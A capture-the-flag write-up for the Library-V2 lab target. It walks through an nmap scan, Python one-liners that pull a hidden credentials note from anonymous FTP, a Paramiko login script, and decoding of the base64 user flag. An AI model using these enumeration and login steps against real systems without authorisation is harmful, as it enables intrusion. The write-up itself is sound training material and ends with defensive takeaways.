Library-V2 - user
192.168.252.137hack10{...}๐ Challenge Objective
The objective of this challenge is to enumerate the provided Virtual Machine target (192.168.252.137), gain initial user access, and capture the user flag.
<br>
๐ Methodology
#### 1. Challenge Overview
The challenge provides a live VM with several standard services open, including anonymous FTP, SSH, HTTP and MySQL. Our goal is to find an initial entry point to retrieve the user-level flag on the system without bypassing the intended Boot2Root process.
#### 2. Initial Reconnaissance
We started with a provided detailed nmap scan which highlighted open ports and services:
Port 21 (FTP): vsftpd 3.0.5 โ Allowed Anonymous FTP login, exposing a public directory.
Port 22 (SSH): OpenSSH 8.9p1 Ubuntu
Port 80 (HTTP): Apache 2.4.52
Port 3306 (MySQL): Unauthorized
Port 8080 (HTTP): nginx 1.18.0
The Nmap scan output:
1$ sudo nmap -sC -sV -T4 192.168.252.1372Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 17:08 -04003Nmap scan report for 192.168.252.1374Host is up (0.0010s latency).5Not shown: 995 closed tcp ports (reset)6PORT STATE SERVICE VERSION721/tcp open ftp vsftpd 3.0.58| ftp-syst: 9| STAT: 10| FTP server status:11| Connected to 192.168.252.13212| Logged in as ftp13| TYPE: ASCII14| No session bandwidth limit15| Session timeout in seconds is 30016| Control connection is plain text17| Data connections will be plain text18| At session startup, client count was 119| vsFTPd 3.0.5 - secure, fast, stable20|_End of status21| ftp-anon: Anonymous FTP login allowed (FTP code 230)22|_drwxr-xr-x 1 106 109 4096 Mar 27 16:10 public2322/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.14 (Ubuntu Linux; protocol 2.0)24| ssh-hostkey: 25| 256 b1:a9:da:c3:dd:c7:70:41:33:99:0d:0e:ea:bd:a3:a7 (ECDSA)26|_ 256 14:c7:12:32:8c:03:2d:07:01:52:b5:a0:aa:91:a3:63 (ED25519)2780/tcp open http Apache httpd 2.4.52 ((Ubuntu))28|_http-title: Site doesn't have a title (text/html).29|_http-server-header: Apache/2.4.52 (Ubuntu)303306/tcp open mysql MySQL (unauthorized)318080/tcp open http nginx 1.18.0 (Ubuntu)32|_http-server-header: nginx/1.18.0 (Ubuntu)33|_http-title: Site doesn't have a title (text/html).34|_http-open-proxy: Proxy might be redirecting requests35MAC Address: 00:0C:29:BB:79:8C (VMware)36Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel37Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .38Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds#### 3. Analysis / Forensics Path
Finding that anonymous FTP was enabled, we scripted a quick FTP connection to interact with the target and browse the inner directories.
Examining the root and the public directory, we found a hidden file named .secret_note.txt.
Fetching it confirmed a message pointing directly to valid credentials:
1$ python3 -c "import ftplib; f = ftplib.FTP('192.168.252.137'); f.login('anonymous', 'anonymous'); f.cwd('public'); print('Public:', f.nlst('-a'))"2Public: ['.', '..', '.secret_note.txt']3$ python3 -c "import ftplib; f = ftplib.FTP('192.168.252.137'); f.login('anonymous', 'anonymous'); f.cwd('public'); f.retrbinary('RETR .secret_note.txt', open('.secret_note.txt', 'wb').write)" \&\& cat .secret_note.txt4To the new librarian:5Please use the password 'Shhh!KeepQuiet' for your local SSH account.6- AdminThis gave us the username librarian and the password Shhh!KeepQuiet.
#### 4. Exploitation / Recovery
Using the discovered credentials, we established an SSH connection to log into the victim machine. We deployed a Paramiko Python script to bypass bash history expansion issues with the exclamation mark (!) in the password string.
1import paramiko2client = paramiko.SSHClient()3client.set_missing_host_key_policy(paramiko.AutoAddPolicy())4client.connect('192.168.252.137', username='librarian', password='Shhh!KeepQuiet')5stdin, stdout, stderr = client.exec_command('id; whoami; ls -la; cat user.txt')6print(stdout.read().decode())Running the script resulted in local user enumeration and retrieval of user.txt:
1$ python3 ssh_test.py2uid=1000(librarian) gid=1000(librarian) groups=1000(librarian)3librarian4total 365drwxr-x--- 1 librarian librarian 4096 Mar 27 21:12 .6drwxr-xr-x 1 root root 4096 Mar 27 16:10 ..7-rw-r--r-- 1 librarian librarian 220 Jan 6 2022 .bash_logout8-rw-r--r-- 1 librarian librarian 3771 Jan 6 2022 .bashrc9drwx------ 2 librarian librarian 4096 Mar 27 21:12 .cache10-rw-r--r-- 1 librarian librarian 807 Jan 6 2022 .profile11drwxr-xr-x 2 librarian librarian 4096 Mar 27 16:10 books12-rw------- 1 librarian librarian 49 Mar 27 16:10 user.txt13aGFjazEwezRuMG55bTB1NV9mdHBfdDBfNTVoX3cwMHR9Cg==The flag inside user.txt was Base64 encoded. Decoding it revealed the genuine plaintext flag:
1$ echo "aGFjazEwezRuMG55bTB1NV9mdHBfdDBfNTVoX3cwMHR9Cg==" | base64 -d23hack10{4n0nym0u5_ftp_t0_55h_w00t}#### 5. Flag
#### 6. Summary of Approach \& Key Takeaways
Methodology: We utilized standard enumeration to identify an anonymous FTP instance. Within the FTP directories, we located a hidden .secret_note.txt file which hardcoded the default credentials for the local librarian user. Logging into SSH allowed us to locate the Base64-encoded user.txt flag and decode it.
Key Takeaways:
Leaving Anonymous login enabled on an FTP server is extremely dangerous if directories containing sensitive configurations, passwords, or backups are not strictly separated and properly permission-restricted.
Hardcoded internal credentials (passwords left in easily accessible text files out of convenience) remains one of the most prominent Initial Access vectors.
Always remember to check for hidden files (-a arguments in directory listings) during initial data recon.